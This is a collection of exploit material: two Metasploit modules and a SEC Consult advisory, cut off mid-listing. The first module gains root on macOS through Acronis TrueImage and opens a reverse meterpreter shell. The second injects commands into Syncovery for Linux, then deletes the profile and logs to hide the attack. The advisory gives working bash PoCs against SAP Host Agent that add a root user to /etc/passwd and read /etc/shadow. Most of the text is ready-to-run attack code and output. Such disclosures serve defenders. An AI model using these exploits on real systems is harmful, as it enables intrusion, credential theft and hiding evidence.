<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = ExcellentRanking<br /><br /> include Msf::Post::File<br /> include Msf::Post::Common<br /> include Msf::Post::Process<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Acronis TrueImage XPC Privilege Escalation',<br /> 'Description' => %q{<br /> Acronis TrueImage versions 2019 update 1 through 2021 update 1<br /> are vulnerable to privilege escalation. The `com.acronis.trueimagehelper`<br /> helper tool does not perform any validation on connecting clients,<br /> which gives arbitrary clients the ability to execute functions provided<br /> by the helper tool with `root` privileges.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Csaba Fitzl', # @theevilbit - Vulnerability Discovery<br /> 'Shelby Pace' # Metasploit Module and Objective-c code<br /> ],<br /> 'Platform' => [ 'osx' ],<br /> 'Arch' => [ ARCH_X64 ],<br /> 'SessionTypes' => [ 'shell', 'meterpreter' ],<br /> 'Targets' => [[ 'Auto', {} ]],<br /> 'Privileged' => true,<br /> 'References' => [<br /> [ 'CVE', '2020-25736' ],<br /> [ 'URL', 'https://kb.acronis.com/content/68061' ],<br /> [ 'URL', 'https://attackerkb.com/topics/a1Yrvagxt5/cve-2020-25736' ]<br /> ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp',<br /> 'WfsDelay' => 15<br /> },<br /> 'DisclosureDate' => '2020-11-11',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'Reliability' => [ REPEATABLE_SESSION ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('WRITABLE_DIR', [ true, 'Writable directory to write the payload to', '/tmp' ]),<br /> OptString.new('SHELL', [ true, 'Shell to use for executing payload', '/bin/zsh' ]),<br /> OptEnum.new('COMPILE', [ true, 'Compile exploit on target', 'Auto', [ 'Auto', 'True', 'False' ] ])<br /> ])<br /> end<br /><br /> def tmp_dir<br /> datastore['WRITABLE_DIR'].to_s<br /> end<br /><br /> def sys_shell<br /> datastore['SHELL'].to_s<br /> end<br /><br /> def compile<br /> datastore['COMPILE']<br /> end<br /><br /> def compile_on_target?<br /> return false if compile == 'False'<br /><br /> if compile == 'Auto'<br /> ret = cmd_exec('xcode-select -p')<br /> return false if ret.include?('error: unable')<br /> end<br /><br /> true<br /> end<br /><br /> def exp_file_name<br /> @exp_file_name ||= Rex::Text.rand_text_alpha(5..10)<br /> end<br /><br /> def check<br /> helper_location = '/Library/PrivilegedHelperTools'<br /> helper_svc_names = [ 'com.acronis.trueimagehelper', 'com.acronis.helpertool' ]<br /> plist = '/Applications/Acronis True Image.app/Contents/Info.plist'<br /><br /> unless helper_svc_names.any? { |svc_name| file?("#{helper_location}/#{svc_name}") }<br /> return CheckCode::Safe<br /> end<br /><br /> return CheckCode::Detected('Service found, but cannot determine version via plist') unless file?(plist)<br /><br /> plutil_cmd = "plutil -extract CFBundleVersion raw \'#{plist}\'"<br /> build_no = cmd_exec(plutil_cmd)<br /> return CheckCode::Detected('Could not retrieve build number from plist') if build_no.blank?<br /><br /> build_no = build_no.to_i<br /> vprint_status("Found build #{build_no}")<br /> return CheckCode::Appears('Vulnerable build found') if build_no > 14170 && build_no < 33610<br /><br /> CheckCode::Safe('Acronis version found is not vulnerable')<br /> end<br /><br /> def exploit<br /> payload_name = Rex::Text.rand_text_alpha(7)<br /> @payload_path = "#{tmp_dir}/#{payload_name}"<br /><br /> print_status("Attempting to write payload at #{@payload_path}")<br /> unless upload_and_chmodx(@payload_path, generate_payload_exe)<br /> fail_with(Failure::BadConfig, 'Failed to write payload. Consider changing WRITABLE_DIR option.')<br /> end<br /> vprint_good("Successfully wrote payload at #{@payload_path}")<br /><br /> @pid = get_valid_pid<br /> exp_bin_path = "#{tmp_dir}/#{exp_file_name}"<br /><br /> if compile_on_target?<br /> exp_src = "#{exp_file_name}.m"<br /> exp_path = "#{tmp_dir}/#{exp_src}"<br /> compile_cmd = "gcc -framework Foundation #{exp_path} -o #{exp_bin_path}"<br /><br /> unless write_file(exp_path, objective_c_code)<br /> fail_with(Failure::BadConfig, 'Failed to write Objective-C exploit to disk. WRITABLE_DIR may need to be changed')<br /> end<br /> register_files_for_cleanup(@payload_path, exp_path, exp_bin_path)<br /><br /> ret = cmd_exec(compile_cmd)<br /> fail_with(Failure::UnexpectedReply, "Failed to compile #{exp_src}") unless ret.blank?<br /><br /> print_status("Successfully compiled #{exp_src}...Now executing payload")<br /> else<br /> print_status("Using pre-compiled exploit #{exp_bin_path}")<br /> compiled_exploit = compiled_exp<br /> unless upload_and_chmodx(exp_bin_path, compiled_exploit)<br /> fail_with(Failure::BadConfig, 'Failed to write compiled exploit. Consider changing WRITABLE_DIR option.')<br /> end<br /><br /> register_files_for_cleanup(exp_bin_path, @payload_path)<br /> end<br /><br /> cmd_exec(exp_bin_path)<br /> end<br /><br /> def objective_c_code<br /> file_contents = exploit_data('CVE-2020-25736', 'acronis-exp.erb')<br /> ERB.new(file_contents).result(binding)<br /> rescue Errno::ENOENT<br /> fail_with(Failure::NotFound, 'ERB payload file not found')<br /> end<br /><br /> def compiled_exp<br /> compiled = exploit_data('CVE-2020-25736', 'acronis-exp.macho')<br /> compiled.gsub!('/tmp/payload', @payload_path)<br /> compiled.gsub!('/bin/zsh', sys_shell)<br /> compiled.gsub!("\xEF\xBE\xAD\xDE".force_encoding('ASCII-8BIT'), [@pid.to_i].pack('V'))<br /><br /> compiled<br /> end<br /><br /> def get_valid_pid<br /> procs = get_processes<br /> return '1' if procs.empty?<br /><br /> len = procs.length<br /> rand_proc = procs[rand(1...len)]<br /> return '1' if rand_proc['pid'].to_s.blank?<br /><br /> rand_proc['pid'].to_s<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'json'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Syncovery For Linux Web-GUI Authenticated Remote Command Execution',<br /> 'Description' => %q{<br /> This module exploits an authenticated command injection vulnerability in the Web GUI of Syncovery File Sync & Backup Software for Linux.<br /> Successful exploitation results in remote code execution under the context of the root user.<br /><br /> Syncovery allows an authenticated user to create jobs, which are executed before/after a profile is run.<br /> Jobs can contain arbitrary system commands and will be executed as root.<br /> A valid username and password or a session token is needed to exploit the vulnerability.<br /> The profile and its log file will be deleted afterwards to disguise the attack.<br /><br /> The vulnerability is known to work on Linux platforms. All Syncovery versions prior to v9.48j are vulnerable including all versions of branch 8.<br /> },<br /> 'Author' => [ 'Jan Rude' ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['URL', 'https://www.mgm-sp.com/en/multiple-vulnerabilities-in-syncovery-for-linux/'],<br /> ['CVE', '2022-36534']<br /> ],<br /> 'Platform' => 'unix',<br /> 'Arch' => [ ARCH_CMD ],<br /> 'Targets' => [<br /> ['Syncovery for Linux < 9.48j', {}]<br /> ],<br /> 'Privileged' => true,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => []<br /> },<br /> 'DisclosureDate' => '2022-09-06',<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'Payload' => 'cmd/unix/python/meterpreter/reverse_tcp'<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> Opt::RPORT(8999), # Default is HTTP: 8999; HTTPS: 8943<br /> OptString.new('USERNAME', [true, 'The username to Syncovery (default: default)', 'default']),<br /> OptString.new('PASSWORD', [true, 'The password to Syncovery (default: pass)', 'pass']),<br /> OptString.new('TOKEN', [false, 'A valid session token', '']),<br /> OptString.new('TARGETURI', [true, 'The path to Syncovery', '/']),<br /> ]<br /> )<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, '/get_global_variables'),<br /> 'method' => 'GET'<br /> )<br /><br /> if res && res.code == 200<br /> json_res = res.get_json_document<br /> if json_res['isSyncoveryWindows'] == 'false'<br /> version = json_res['SyncoveryTitle']&.scan(/Syncovery\s([A-Za-z0-9.]+)/)&.flatten&.first || ''<br /> if version.empty?<br /> vprint_warning("#{peer} - Could not identify version")<br /> Exploit::CheckCode::Detected<br /> elsif Rex::Version.new(version) < Rex::Version.new('9.48j') || Rex::Version.new(version) == Rex::Version.new('9.48')<br /> vprint_good("#{peer} - Syncovery #{version}")<br /> Exploit::CheckCode::Appears<br /> else<br /> vprint_status("#{peer} - Syncovery #{version}")<br /> Exploit::CheckCode::Safe<br /> end<br /> else<br /> Exploit::CheckCode::Safe<br /> end<br /> else<br /> Exploit::CheckCode::Unknown<br /> end<br /> end<br /><br /> def exploit<br /> @token = datastore['TOKEN']<br /> if @token.blank?<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, '/post_applogin.php'),<br /> 'vars_get' => {<br /> 'login' => datastore['USERNAME'].to_s,<br /> 'password' => datastore['PASSWORD'].to_s<br /> },<br /> 'method' => 'GET'<br /> })<br /><br /> unless res<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request")<br /> end<br /><br /> # After login, the application should give us a new token<br /> # session_token is actually just base64(MM/dd/yyyy HH:mm:ss) at the time of the login<br /> json_res = res.get_json_document<br /> @token = json_res['session_token']<br /> if @token.present?<br /> vprint_good("#{peer} - Login successful")<br /> else<br /> fail_with(Failure::NoAccess, "#{peer} - Invalid credentials!")<br /> end<br /> end<br /><br /> # send payload<br /> @profile_name = Rex::Text.rand_text_alpha_lower(20)<br /> json_body = {<br /> 'ProfileName' => @profile_name,<br /> 'Action' => 'Insert',<br /> 'FormName' => 'synapp_profile_editor_form',<br /> 'token' => @token,<br /> 'Name' => @profile_name,<br /> 'LeftPath' => '/dev/null',<br /> 'LeftPathDisplay' => '/dev/null',<br /> 'RightPath' => '/dev/null',<br /> 'RightPathDisplay' => '/dev/null',<br /> 'Job_ExecuteBefore' => payload.encoded<br /> }<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/post_profilesettings.php'),<br /> 'headers' => {<br /> 'X-Requested-With' => 'XMLHttpRequest',<br /> 'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8'<br /> },<br /> 'data' => JSON.generate(json_body)<br /> })<br /><br /> if res && res.code == 200<br /> if res.body.to_s.include? 'Session Expired'<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Invalid token (Session Expired)")<br /> elsif res.body.to_s.include? 'Inserted'<br /> vprint_good("#{peer} - Profile created")<br /> else<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Error (#{res.body})")<br /> end<br /> else<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Error (response code: #{res.code})")<br /> end<br /><br /> vprint_status("#{peer} - Running profile")<br /> json_body = {<br /> 'ProfileName' => @profile_name,<br /> 'token' => @token,<br /> 'attended' => true<br /> }<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/post_runprofile.php'),<br /> 'data' => JSON.generate(json_body)<br /> })<br /><br /> if res && res.code == 200<br /> print_good("#{peer} - Exploit successfully executed")<br /> else<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Could not run profile (response code: #{res.code})")<br /> end<br /> end<br /><br /> def on_new_session(session)<br /> # Delete profile to disguise attack in Web GUI<br /> vprint_status("#{peer} - Trying to delete IOCs")<br /> json_body = {<br /> 'ProfileName' => @profile_name,<br /> 'token' => @token<br /> }<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/post_deleteprofile.php'),<br /> 'data' => JSON.generate(json_body)<br /> })<br /><br /> if res && res.code == 200 && (res.body.to_s.include? 'Deleted')<br /> vprint_good("#{peer} - Profile successfully deleted")<br /> else<br /> print_error("#{peer} - Could not delete profile (#{res.body})")<br /> end<br /><br /> # Remove IOC by deleting log files<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/getprogram_settings.php'),<br /> 'vars_get' => {<br /> 'token' => @token<br /> }<br /> )<br /><br /> if res && res.code == 200<br /> json_res = res.get_json_document<br /> if json_res['LogPath'].present?<br /> log_path = json_res['LogPath']<br /> end<br /> end<br /><br /> # Request log files<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/logfiles.json'),<br /> 'vars_get' => {<br /> 'pagenum' => 0,<br /> 'pagesize' => 1<br /> },<br /> 'headers' => {<br /> 'token' => @token<br /> }<br /> })<br /><br /> if res && res.code == 200<br /> log_file = res.body.scan(/#{@profile_name}.*?\.log/)&.flatten&.first || ''<br /> register_file_for_cleanup("#{log_path}/#{log_file}")<br /> else<br /> register_dirs_for_cleanup(log_path.to_s)<br /> end<br /><br /> super<br /> end<br />end<br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20221213-0 ><br />=======================================================================<br /> title: Privilege Escalation Vulnerabilities (UNIX Insecure File<br /> Handling)<br /> product: SAP® Host Agent (saposcol)<br /> vulnerable version: see section "Vulnerable / tested versions"<br /> fixed version: see SAP security note 3159736<br /> CVE number: CVE-2022-35295<br /> impact: high<br /> homepage: https://www.sap.com/about.html<br /> found: 2022-02-18<br /> by: Fabian Hagg (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"SAP® Host Agent is an agent that can accomplish several life-cycle<br />management tasks, such as operating system monitoring, database<br />monitoring, system instance control and provisioning."<br /><br />Source: https://help.sap.com/viewer/141cbf7f183242b0ad0964a5195b24e7/202110.000/en-US/48c6f9627a004da5e10000000a421937.html<br /><br /><br />Business recommendation:<br />------------------------<br />By exploiting the vulnerabilities documented in this advisory, a<br />local attacker may escalate privileges on UNIX systems to fully<br />compromise vulnerable servers with root privileges.<br /><br />SEC Consult recommends to implement security note 3159736 where the<br />documented issue is fixed according to the vendor. We advise installing<br />the corrections as a matter of priority to keep business-critical<br />data secured.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />Multiple vulnerabilities were identified that could allow a local<br />attacker authenticated as <sid>adm to escalate privileges on SAP UNIX<br />systems. No additional user authentication is required to exploit<br />these issues. The vulnerabilities are due to the privileged saposcol<br />process generating files in its default working directory (/usr/sap/tmp;<br />defined by profile parameter DIR_PERF) owned by the <sid>adm user (sapsys<br />group), and following symbolic links (symlinks) when trying to open/create<br />these files. Note that in some environments the directory might not be<br />owned by the <sid>adm user account but be writable for all users of<br />group sapsys including <sid>adm.<br /><br />An attacker is able to spoof the symbolic links, thus traversing the<br />file system and gaining access to unintended resources. This could permit<br />an attacker to read/write/corrupt files owned by the root user account<br />leading to privilege escalation.<br /><br /><br />1) UNIX Symlink Following and Insecure File Permissions in Detailed<br /> Lock Logging Feature of saposcol<br /><br />The stand-alone saposcol binary available in UNIX systems at<br />/usr/sap/hostctrl/exe/saposcol provides a debugging feature called<br />"detailed lock logging". For this option to be activated, the user<br /><sid>adm can perform the following action:<br /><br />- Starting the stand-alone saposcol binary with command line argument<br /> StartLockLog (/usr/sap/hostctrl/exe/saposcol StartLockLog).<br /><br />Once executed, a special flag is set in shared memory that triggers<br />multiple running processes and services (sapstartsrv, saposcol) to<br />create a file called SaposcolMonAreaLocking.log in the default<br />working directory. This directory is writable by the user<br /><sid>adm (group sapsys). One of the processes trying to create the<br />file is the main saposcol service running in the context of the root<br />user account. It was observed that the file is created by the process<br />using the openat() syscall with flags O_WRONLY, O_CREAT and O_APPEND.<br /><br />-----------------------------------------------------------------------<br />root@sapsrv:~# ps -efw<br />root 1998 /usr/sap/hostctrl/exe/saposcol -l -w60 pf=/usr/sap/hostctrl/<br />exe/host_profile<br /><br /># Tracing the sapsocol process with PID 1998<br />root@sapsrv:~# strace -f -e trace=openat,chmod,chown -p 1998 -q<br />[...]<br />openat(AT_FDCWD, "/usr/sap/tmp/SaposcolMonAreaLocking.log", O_WRONLY|<br />O_CREAT|O_APPEND, 0666) = 6<br />chmod("/usr/sap/tmp/SaposcolMonAreaLocking.log", 0666) = 0<br />-----------------------------------------------------------------------<br /><br />Since the openat() call does not have the O_EXCL flag set, it is not<br />ensured that the process actually creates the file. That is, if the<br />file under the given path already exists, the process tries to open<br />the existing file for appending data to it and changing its permissions<br />to world-readable/world-writable (666). Since the process, when<br />opening an existing file, does not check (e.g., by setting the<br />O_NOFOLLOW flag) whether it is a symbolic link that resolves to a<br />target outside of the intended directory, an attacker can cause the<br />process to operate on unauthorized files by placing a malicious symlink<br />before activating the detailed lock logging feature via the stand-alone<br />saposcol binary. This vulnerability may allow an attacker to gain read/<br />write access to arbitrary files owned by the root user account.<br /><br /><br />2) UNIX Symlink Following and Race Condition in Hardware Reporting<br /> Feature of saposcol<br /><br />The main saposcol service running in the context of the root user<br />account allows to generate reports containing information about the<br />underlying operating system and hardware configuration. For these<br />reports to be generated, the user <sid>adm can perform different<br />actions:<br /><br />- Using function GetSAPOSColHWConf of the saphostctrl binary<br /> (/usr/sap/hostctrl/exe/saphostctrl -function GetSAPOSColHWConf<br /> [-format <tree|flat>]) that generates a SOAP request for the host<br /> agent service (SAPHostControl) on port 1128/1129. The request is<br /> forwarded by sapstartsrv to the saposcol service for processing.<br /> <br />- Manually crafting a SOAP request identical to the one generated by<br /> the saphostctrl binary and sending it to localhost on port 1128<br /> /1129 via the loopback interface (e.g., using curl). This request<br /> is forwarded by sapstartsrv to the saposcol service for processing.<br /> <br />- Using the dialog interface of the stand-alone saposcol binary<br /> (/usr/sap/hostctrl/exe/saposcol -d) and its "ask" feature (ask<br /> Hardware/ ask HardwareXML) that communicates with the saposcol<br /> service using shared memory segments.<br /><br />- Using transaction ST06 in the application layer (ABAP based<br /> instances only).<br /><br />When requested via the SOAP interface of SAPHostControl (sapstartsrv),<br />the privileged saposcol process tries to generate the file<br />hwconfig_<host> / hw_<host>.xml (depending on whether the XML output<br />format is queried) in its working directory. The process then<br />collects information about OS resources and writes this data to the given<br />file. Once saposcol finished its work, the SAPHostControl service opens<br />and reads the file before providing the results to the caller via SOAP<br />response. That is, the newly created file is handled as a shared<br />resource by both processes. It was observed that when creating a<br />malicious symlink before triggering the execution flow described above,<br />the saposcol service does not verify if the link points to a resource<br />outside of the intended directory. Therefore, the targeted file gets<br />truncated, and the collected OS information is written into to it.<br />This could allow an attacker to corrupt files owned by the root<br />user account.<br /><br />Moreover, by looking at the sequence of system calls, it<br />was identified that this procedure also yields a race condition that<br />could be exploited to gain unauthorized read access to files without<br />corrupting them. The syscalls performed by the two processes, when the<br />hardware report is requested via the SOAP interface of SAPHostControl,<br />is shown in the following listing.<br /><br />-----------------------------------------------------------------------<br /># Triggering the execution flow via the saphostctrl binary<br />secadm@sapsrv:~$ /usr/sap/hostctrl/exe/saphostctrl -function<br />GetSAPOSColHWConf<br /><br /># Tracing the saposcol process with PID 1998<br />root@sapsrv:~# strace -f -e trace=openat,chmod,chown -p 1998 -q -o<br />strace.saposcol -T -tt<br /><br />root@sapsrv:~# cat strace.saposcol | grep "/usr/sap/tmp/hwconfig_sapsrv"<br />[...]<br />1998 01:06:18.370022 openat(AT_FDCWD,"/usr/sap/tmp/hwconfig_sapsrv",<br />O_WRONLY|O_CREAT|O_EXCL|O_TRUNC, 0664) = 6<br />1998 01:06:18.370473 chown("/usr/sap/tmp/hwconfig_sapsrv", -1, 460) = 0<br />1998 01:06:18.370581 chmod("/usr/sap/tmp/hwconfig_sapsrv", 0664) = 0<br />1998 01:06:35.231717 chown("/usr/sap/tmp/hwconfig_sapsrv", -1, 460) = 0<br />1998 01:06:35.231833 chmod("/usr/sap/tmp/hwconfig_sapsrv", 0640) = 0<br />[...]<br /><br /># Tracing the sapstartsrv SAPHostControl process with PID 1713<br />root@sapsrv:~# strace -f -e trace=open,openat,chmod,chown -p 1713 -q -o<br />strace.sapstartsrv -T -tt<br /><br />root@sapsrv:~# less strace.sapstartsrv | grep "/usr/sap/tmp/hwconfig_sapsrv"<br />[...]<br />1713 01:06:35.782818 openat(AT_FDCWD,"/usr/sap/tmp/hwconfig_sapsrv",<br /> O_RDONLY) = 20<br />[...]<br />-----------------------------------------------------------------------<br /><br />It can be seen that the saposcol service first requests a file<br />descriptor by creating the report file via the openat() syscall. The<br />file is made readable/writable (664) to all users of group sapsys by<br />means of the first series of chmod()/chown() syscalls. The process then<br />retrieves the OS information and writes the results into the report<br />file before a second series of chmod()/chown() syscall ensures that<br />this file is made read-only (640) to users of group sapsys only. The<br />program, however, does not check whether the file under the given path<br />has changed since it was created in the first place. An attacker can<br />attempt to place a malicious symlink in the interval between the<br />saposcol process succeeds in creating the report file and obtaining a<br />file descriptor and before the file permissions are changed by the<br />second series of chmod()/chown() syscalls.<br /><br />If an attacker manages to carefully choose the time period between<br />triggering the execution flow and replacing the newly created file<br />with a link to an otherwise inaccessible resource, this resource does<br />not get corrupted. Instead, the targeted file is made readable to all<br />users of group sapsys, and its content is returned by the SAPHostControl<br />process opening the file in read-only mode afterwards. This may allow<br />an attacker to gain read access to files owned by the root user account.<br /><br /><br />3) UNIX Symlink Following and Race Condition in System Log Feature of<br /> saposcol<br /><br />The main saposcol service running in the context of the root user<br />account allows to generate reports containing information about<br />operating system logs. For these reports to be generated, the user<br /><sid>adm can perform the following action:<br /><br />- Using the dialog interface of the stand-alone saposcol binary<br /> (/usr/sap/hostctrl/exe/saposcol -d) and its "ask" feature (ask<br /> OsSysLog <number of lines>) that communicates with the main<br /> saposcol process using shared memory segments.<br /><br />- Using transaction ST06 in the application layer (ABAP based<br /> instances only).<br /> <br />It was observed that when creating the system log report file<br />ossyslog_<host> in its working directory, the saposcol process<br />appears to be vulnerable to the same issues as described in 2.<br /><br /><br />4) UNIX Symlink Following in Log File Creation of saposcol<br /><br />The main saposcol service running in the context of the root user<br />account writes log information to the files dev_coll and<br />dev_coll.tmp in its working directory. It was observed that when<br />creating these log files during startup, the saposcol process<br />resolves malicious symlinks which can be exploited to corrupt<br />arbitrary files owned by the root user account. For successful<br />exploitation, however, user interaction and a restart of the main<br />saposcol process is required. To provoke a restart, the <sid>adm<br />user can stop the running saposcol process by performing the<br />following action:<br /><br />- Using option -k of the stand-alone saposcol binary<br /> (/usr/sap/hostctrl/exe/saposcol -k) that communicates with the<br /> main saposcol process using shared memory segments.<br /><br /><br />5) UNIX Symlink Following in Shared Memory Dump File Creation of<br /> saposcol<br /><br />The main saposcol service running in the context of the root user<br />account writes the data in the shared memory segment to the file coll.put<br />in its working directory when being terminated. It was observed<br />that when creating this file, the saposcol process resolves malicious<br />symlinks which can be exploited to corrupt arbitrary files owned by<br />the root user account. To stop the running saposcol process and<br />trigger the execution flow, the <sid>adm user can perform the<br />following action:<br /><br />- Using option -k of the stand-alone saposcol binary<br /> (/usr/sap/hostctrl/exe/saposcol -k) that communicates with the<br /> main saposcol process using shared memory segments.<br /><br /><br />Proof of concept:<br />-----------------<br />Note that the following PoCs are for demonstration purposes only and<br />must not be executed in live environments.<br /><br /><br />1) UNIX Symlink Following and Insecure File Permissions in Detailed<br /> Lock Logging Feature of saposcol<br /><br />For demonstration purposes, the bash snippet saposcollpe shown in<br />the following listing can be executed when being authenticated to<br />the local system as <sid>adm.<br /><br />-----------------------------------------------------------------------<br />#!/bin/bash<br /><br />PASSWD="/etc/passwd"<br />USER=$1<br />PASS=$(openssl passwd -1 -salt $1 $2)<br /><br />echo "[i] Creating malicious symlink."<br />ln -sf $PASSWD /usr/sap/tmp/SaposcolMonAreaLocking.log;<br />echo "[i] Dropping dbg flag in shm via saposcol."<br />/usr/sap/hostctrl/exe/saposcol StartLockLog > /dev/null;<br />echo "[i] Waiting for permissions to be set..."<br />while true; do<br /> if [ -w $PASSWD ]<br /> then<br /> rm -f /usr/sap/tmp/SaposcolMonAreaLocking.log;<br /> /usr/sap/hostctrl/exe/saposcol StopLockLog > /dev/null;<br /> echo "[i] Success. /etc/passwd is now world-writable."<br /> echo "$USER:$PASS:0:0::/root:/bin/bash" >> /etc/passwd;<br /> echo "[i] New user" $USER "with UID 0 created."<br /> break<br /> fi<br />done<br />echo "[+] Done"<br />-----------------------------------------------------------------------<br /><br />This script exploits the vulnerability to create a new user (username<br />and password specified via command line args) holding root privileges.<br /><br />-----------------------------------------------------------------------<br />secadm@sapsrv:~$ whoami<br />secadm<br /><br />secadm@sapsrv:~$ id<br />uid=1001(secadm) gid=493(sapsys) groups=493(sapsys),1001(sapinst)<br /><br />secadm@sapsrv:~$ ./saposcollpe sapmatt sappass<br />[i] Creating malicious symlink.<br />[i] Dropping dbg flag in shm via saposcol.<br />[i] Waiting for permissions to be set.<br />[i] Success. /etc/passwd is now world-writable.<br />[i] New user sapmatt with UID 0 created.<br />[+] Done<br /><br />secadm@sapsrv:~$ su - sapmatt<br />Password:<br />Directory: /root<br /><br />sapsrv:~# whoami<br />sapmatt<br /><br />sapsrv:~# id<br />uid=0(sapmatt) gid=0(root) groups=0(root)<br />-----------------------------------------------------------------------<br /><br /><br />2) UNIX Symlink Following and Race Condition in Hardware Reporting<br /><br />For demonstration purposes, the bash snippet saposcolrace shown in<br />the following listing can be executed when being authenticated to the<br />local system as <sid>adm.<br /><br />-----------------------------------------------------------------------<br />#!/bin/bash<br /><br />HOST=$(hostname)<br />TARGETFILE=$1<br />COUNTER=10<br />OUT="CONTINUE"<br /><br />ls -la $TARGETFILE<br />echo "[i] Racing..."<br />while [ -n "$OUT" ]<br />do<br /> echo "[*] $COUNTER sec"<br /> rm -f /usr/sap/tmp/hwconfig_$HOST<br /> /usr/sap/hostctrl/exe/saphostctrl -function GetSAPOSColHWConf > /tmp/out 2>>/tmp/out &<br /> sleep "$COUNTER"s; ln -sf $TARGETFILE /usr/sap/tmp/hwconfig_$HOST #set symbolic link<br /> wait; rm -f /usr/sap/tmp/hwconfig_$HOST<br /> OUT=$(cat /tmp/out | grep -i "HW File")<br /> if [ -n "$OUT" ]<br /> then<br /> echo "[i] Final laps..."<br /> let "COUNTER-=1"<br /> else<br /> OUT=$(cat /tmp/out | grep -i "LINUX Configuration")<br /> let "COUNTER-=1"<br /> fi<br />done<br />echo "[+] Profit!"<br />ls -la $TARGETFILE && cat /tmp/out && rm -f /tmp/out<br />-----------------------------------------------------------------------<br /><br />This script exploits the vulnerability to obtain the contents of a file<br />specified as a command line argument. In the following example, the<br />/etc/shadow file containing password hashes of the system accounts is<br />retrieved.<br /><br />-----------------------------------------------------------------------<br />secadm@sapsrv:~$ whoami<br />secadm<br /><br />secadm@sapsrv:~$ id<br />uid=1001(secadm) gid=493(sapsys) groups=493(sapsys),1001(sapinst)<br /><br />secadm@sapsrv:~$ ./saposcolrace /etc/shadow<br />-rw-r----- 1 root shadow 609 Feb 9 2021 /etc/shadow<br />[i] Racing....<br />[*] 10 sec<br />[*] 9 sec<br />[*] 8 sec<br />[*] 7 sec<br />[*] 6 sec<br />[*] 5 sec<br />[*] 4 sec<br />[*] 3 sec<br />[i] Final laps....<br />[*] 2 sec<br />[+] Profit!<br />-rw-r----- 1 root sapsys 609 Feb 9 2021 /etc/shadow<br />Webmethod returned successfully<br />-----------------------------------------------------------------------<br />Name = /usr/sap/tmp/hwconfig_sapsrv<br />Content<br />-----------------------------------------------------------------------<br />root:*:18516::::::<br />bin:*:18516::::::<br />daemon:*:18516::::::<br />[...]<br />-----------------------------------------------------------------------<br /><br /><br />3) UNIX Symlink Following and Race Condition in System Log Feature of<br /> saposcol<br /><br />The vulnerability can be verified by placing a malicious symlink and<br />querying the operating system logs via the stand-alone saposcol binary<br />as shown in the following listing.<br /><br />-----------------------------------------------------------------------<br />secadm@sapsrv:~$ ln -sf /etc/passwd /usr/sap/tmp/ossyslog_<host><br />secadm@sapsrv:~$ /usr/sap/hostctrl/exe/saposcol -d<br />Collector > ask OsSysLog 10<br />-----------------------------------------------------------------------<br /><br />After execution, the file /etc/passwd containing essential user account<br />information is overwritten by system log information. The file is also<br />made read-only to users of group sapsys only. If the time period between<br />querying the operating system log and replacing the newly created report<br />file with a malicious symlink is chosen carefully (similar to the technique<br />shown in 2.), the targeted file can be made readable without corrupting it.<br /><br /><br />4) UNIX Symlink Following in Log File Creation of saposcol<br /><br />The vulnerability can be verified by placing a malicious symlink as<br />shown in the following listing.<br /><br />-----------------------------------------------------------------------<br />secadm@sapsrv:~$ ln -sf /etc/passwd /usr/sap/tmp/dev_coll<br />secadm@sapsrv:~$ ln -sf /etc/passwd /usr/sap/tmp/dev_coll.tmp<br />-----------------------------------------------------------------------<br /><br />After a restart of the main saposcol process, the file /etc/passwd containing<br />essential user account information is overwritten by log data.<br /><br /><br />5) UNIX Symlink Following in Shared Memory Dump File Creation<br /> of saposcol<br /><br />The vulnerability can be verified by placing a malicious symlink and stopping<br />the running saposcol process via the stand-alone saposcol binary as shown<br />in the following listing.<br /><br />-----------------------------------------------------------------------<br />secadm@sapsrv:~$ ln -sf /etc/passwd 